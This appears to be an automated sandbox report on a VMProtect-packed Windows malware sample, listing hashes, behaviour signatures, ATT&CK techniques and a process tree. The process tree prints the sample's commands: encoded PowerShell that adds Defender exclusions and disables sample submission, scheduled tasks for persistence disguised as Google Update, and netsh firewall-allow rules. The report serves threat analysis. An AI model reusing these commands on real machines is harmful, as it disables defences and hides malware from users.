09c92f58d9b11db5d9a7e984cb3270bcc6db79ea153dea86788eccaaa561d50c

Resubmissions

04-09-2023 00:34

230904-aw2lnacf8t 8

03-09-2023 22:30

230903-2expxscg96 8

Analysis

max time kernel
293s
max time network
300s
platform
windows10-1703_x64
resource
win10-20230703-en
resource tags

arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
submitted
04-09-2023 00:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f429fjd4uf84u.exe
Size

6.1MB
MD5

aaead1169523638d40ca4d884e3d787a
SHA1

e6c673b0d2569b0d9c21a82494ea9a5cd2f1b587
SHA256

09c92f58d9b11db5d9a7e984cb3270bcc6db79ea153dea86788eccaaa561d50c
SHA512

81bde7c5632279473493f777733808faa48ada450db174e3f0ed11e22505bfd5970c2022a135213abf9fc2c1e2f047eaee8428308c5e9dd9bb7842edc2deccc3
SSDEEP

196608:LZLecymZqT+XX9Atk+7TDhlXRZvYdtEA6OSwK:Nhyzy9AtpRZv2R6Oy

Score

8^/10

evasion vmprotect

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 3 IoCs

evasion

Windows Service

T1543.003

pid	Process
428	netsh.exe
4568	netsh.exe
1628	netsh.exe

Executes dropped EXE 1 IoCs

pid	Process
4504	GoogleUpdate.exe

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/memory/4504-110-0x0000000002DC0000-0x000000000367F000-memory.dmp	vmprotect
behavioral1/memory/4504-153-0x0000000002DC0000-0x000000000367F000-memory.dmp	vmprotect
behavioral1/memory/4504-245-0x0000000002DC0000-0x000000000367F000-memory.dmp	vmprotect
behavioral1/memory/4504-508-0x0000000002DC0000-0x000000000367F000-memory.dmp	vmprotect

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3416 set thread context of 4504	3416	f429fjd4uf84u.exe	77

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\GoogleUpdate.exe	f429fjd4uf84u.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4972	SCHTASKS.exe
2716	SCHTASKS.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2036	powershell.exe
4304	powershell.exe
2036	powershell.exe
4304	powershell.exe
2036	powershell.exe
4304	powershell.exe
4504	GoogleUpdate.exe
4504	GoogleUpdate.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4304	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 3416 wrote to memory of 4304	3416	f429fjd4uf84u.exe	69
PID 3416 wrote to memory of 4304	3416	f429fjd4uf84u.exe	69
PID 3416 wrote to memory of 4304	3416	f429fjd4uf84u.exe	69
PID 3416 wrote to memory of 2036	3416	f429fjd4uf84u.exe	70
PID 3416 wrote to memory of 2036	3416	f429fjd4uf84u.exe	70
PID 3416 wrote to memory of 2036	3416	f429fjd4uf84u.exe	70
PID 3416 wrote to memory of 4972	3416	f429fjd4uf84u.exe	71
PID 3416 wrote to memory of 4972	3416	f429fjd4uf84u.exe	71
PID 3416 wrote to memory of 4972	3416	f429fjd4uf84u.exe	71
PID 3416 wrote to memory of 2716	3416	f429fjd4uf84u.exe	75
PID 3416 wrote to memory of 2716	3416	f429fjd4uf84u.exe	75
PID 3416 wrote to memory of 2716	3416	f429fjd4uf84u.exe	75
PID 3416 wrote to memory of 4504	3416	f429fjd4uf84u.exe	77
PID 3416 wrote to memory of 4504	3416	f429fjd4uf84u.exe	77
PID 3416 wrote to memory of 4504	3416	f429fjd4uf84u.exe	77
PID 3416 wrote to memory of 4504	3416	f429fjd4uf84u.exe	77
PID 3416 wrote to memory of 4504	3416	f429fjd4uf84u.exe	77
PID 3416 wrote to memory of 4504	3416	f429fjd4uf84u.exe	77
PID 3416 wrote to memory of 4504	3416	f429fjd4uf84u.exe	77
PID 3416 wrote to memory of 4504	3416	f429fjd4uf84u.exe	77
PID 3416 wrote to memory of 4504	3416	f429fjd4uf84u.exe	77
PID 4504 wrote to memory of 4568	4504	GoogleUpdate.exe	82
PID 4504 wrote to memory of 4568	4504	GoogleUpdate.exe	82
PID 4504 wrote to memory of 4568	4504	GoogleUpdate.exe	82
PID 4504 wrote to memory of 428	4504	GoogleUpdate.exe	79
PID 4504 wrote to memory of 428	4504	GoogleUpdate.exe	79
PID 4504 wrote to memory of 428	4504	GoogleUpdate.exe	79
PID 4504 wrote to memory of 1628	4504	GoogleUpdate.exe	78
PID 4504 wrote to memory of 1628	4504	GoogleUpdate.exe	78
PID 4504 wrote to memory of 1628	4504	GoogleUpdate.exe	78

C:\Users\Admin\AppData\Local\Temp\f429fjd4uf84u.exe
"C:\Users\Admin\AppData\Local\Temp\f429fjd4uf84u.exe"
1⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3416
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4304
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2036
- C:\Windows\SysWOW64\SCHTASKS.exe
  SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Temp\f429fjd4uf84u.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:4972
- C:\Windows\SysWOW64\SCHTASKS.exe
  SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Temp\f429fjd4uf84u.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:2716
- C:\Windows\GoogleUpdate.exe
  C:\Windows\GoogleUpdate.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:1628
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:428
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL
    3⤵
    - Modifies Windows Firewall
    PID:4568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
11b8abfad6f80ade8c87dda59a946de2

SHA1
95b8a91641be0edb83e32c359c6d122c3a89b0a8

SHA256
6b73ce0661429b82e188da67577d18e9e5eebc4e24f911c5c30b93f2f0b14e5b

SHA512
932831b612b768d3190be8659c7b56a34586f8425bec2071976df24c4978816e61cb13d10b207881a91096ddbc74a6c02eae7dc5cab010eb2618d7ae99e74dde

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lnf221ws.npv.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Windows\GoogleUpdate.exe

Filesize
150KB

MD5
9a66a3de2589f7108426af37ab7f6b41

SHA1
12950d906ff703f3a1e0bd973fca2b433e5ab207

SHA256
a913415626433d5d0f07d3ec4084a67ff6f5138c3c3f64e36dd0c1ae4c423c65

SHA512
a4e81bffbfa4d3987a8c10cec5673fd0c8aecbb96104253731bfcab645090e631786ff7bde78607cbb2d242ee62051d41658059fcbbc4990c40dbb0fec66fcd6

Download Submit
C:\Windows\GoogleUpdate.exe

Filesize
150KB

MD5
9a66a3de2589f7108426af37ab7f6b41

SHA1
12950d906ff703f3a1e0bd973fca2b433e5ab207

SHA256
a913415626433d5d0f07d3ec4084a67ff6f5138c3c3f64e36dd0c1ae4c423c65

SHA512
a4e81bffbfa4d3987a8c10cec5673fd0c8aecbb96104253731bfcab645090e631786ff7bde78607cbb2d242ee62051d41658059fcbbc4990c40dbb0fec66fcd6

Download Submit
memory/2036-10-0x0000000007B80000-0x00000000081A8000-memory.dmp

Filesize
6.2MB

Download
memory/2036-18-0x0000000008AB0000-0x0000000008B26000-memory.dmp

Filesize
472KB

Download
memory/2036-13-0x0000000007AD0000-0x0000000007B36000-memory.dmp

Filesize
408KB

Download
memory/2036-482-0x00000000076A0000-0x00000000076BA000-memory.dmp

Filesize
104KB

Download
memory/2036-312-0x0000000007540000-0x0000000007550000-memory.dmp

Filesize
64KB

Download
memory/2036-8-0x0000000007540000-0x0000000007550000-memory.dmp

Filesize
64KB

Download
memory/2036-4-0x0000000073110000-0x00000000737FE000-memory.dmp

Filesize
6.9MB

Download
memory/2036-67-0x0000000009EC0000-0x0000000009F54000-memory.dmp

Filesize
592KB

Download
memory/2036-524-0x0000000073110000-0x00000000737FE000-memory.dmp

Filesize
6.9MB

Download
memory/2036-51-0x000000007F3A0000-0x000000007F3B0000-memory.dmp

Filesize
64KB

Download
memory/2036-52-0x0000000009BB0000-0x0000000009BE3000-memory.dmp

Filesize
204KB

Download
memory/2036-225-0x000000007F3A0000-0x000000007F3B0000-memory.dmp

Filesize
64KB

Download
memory/2036-106-0x0000000007540000-0x0000000007550000-memory.dmp

Filesize
64KB

Download
memory/2036-66-0x0000000073110000-0x00000000737FE000-memory.dmp

Filesize
6.9MB

Download
memory/2036-64-0x0000000007540000-0x0000000007550000-memory.dmp

Filesize
64KB

Download
memory/2036-5-0x0000000005310000-0x0000000005346000-memory.dmp

Filesize
216KB

Download
memory/4304-17-0x0000000008C20000-0x0000000008C6B000-memory.dmp

Filesize
300KB

Download
memory/4304-14-0x0000000008380000-0x00000000083E6000-memory.dmp

Filesize
408KB

Download
memory/4304-65-0x0000000005440000-0x0000000005450000-memory.dmp

Filesize
64KB

Download
memory/4304-63-0x0000000009B10000-0x0000000009BB5000-memory.dmp

Filesize
660KB

Download
memory/4304-525-0x0000000073110000-0x00000000737FE000-memory.dmp

Filesize
6.9MB

Download
memory/4304-6-0x0000000073110000-0x00000000737FE000-memory.dmp

Filesize
6.9MB

Download
memory/4304-96-0x0000000073110000-0x00000000737FE000-memory.dmp

Filesize
6.9MB

Download
memory/4304-9-0x0000000005440000-0x0000000005450000-memory.dmp

Filesize
64KB

Download
memory/4304-54-0x00000000099B0000-0x00000000099CE000-memory.dmp

Filesize
120KB

Download
memory/4304-12-0x0000000007A60000-0x0000000007A82000-memory.dmp

Filesize
136KB

Download
memory/4304-491-0x00000000076D0000-0x00000000076D8000-memory.dmp

Filesize
32KB

Download
memory/4304-365-0x0000000005440000-0x0000000005450000-memory.dmp

Filesize
64KB

Download
memory/4304-53-0x000000007E790000-0x000000007E7A0000-memory.dmp

Filesize
64KB

Download
memory/4304-16-0x00000000081F0000-0x000000000820C000-memory.dmp

Filesize
112KB

Download
memory/4304-15-0x0000000008440000-0x0000000008790000-memory.dmp

Filesize
3.3MB

Download
memory/4304-262-0x000000007E790000-0x000000007E7A0000-memory.dmp

Filesize
64KB

Download
memory/4504-259-0x0000000001320000-0x00000000018B1000-memory.dmp

Filesize
5.6MB

Download
memory/4504-245-0x0000000002DC0000-0x000000000367F000-memory.dmp

Filesize
8.7MB

Download
memory/4504-153-0x0000000002DC0000-0x000000000367F000-memory.dmp

Filesize
8.7MB

Download
memory/4504-68-0x0000000001320000-0x00000000018B1000-memory.dmp

Filesize
5.6MB

Download
memory/4504-148-0x0000000000610000-0x0000000000611000-memory.dmp

Filesize
4KB

Download
memory/4504-508-0x0000000002DC0000-0x000000000367F000-memory.dmp

Filesize
8.7MB

Download
memory/4504-110-0x0000000002DC0000-0x000000000367F000-memory.dmp

Filesize
8.7MB

Download
memory/4504-98-0x0000000002DC0000-0x000000000367F000-memory.dmp

Filesize
8.7MB

Download
memory/4504-86-0x0000000001320000-0x00000000018B1000-memory.dmp

Filesize
5.6MB

Download
memory/4504-74-0x0000000001320000-0x00000000018B1000-memory.dmp

Filesize
5.6MB

Download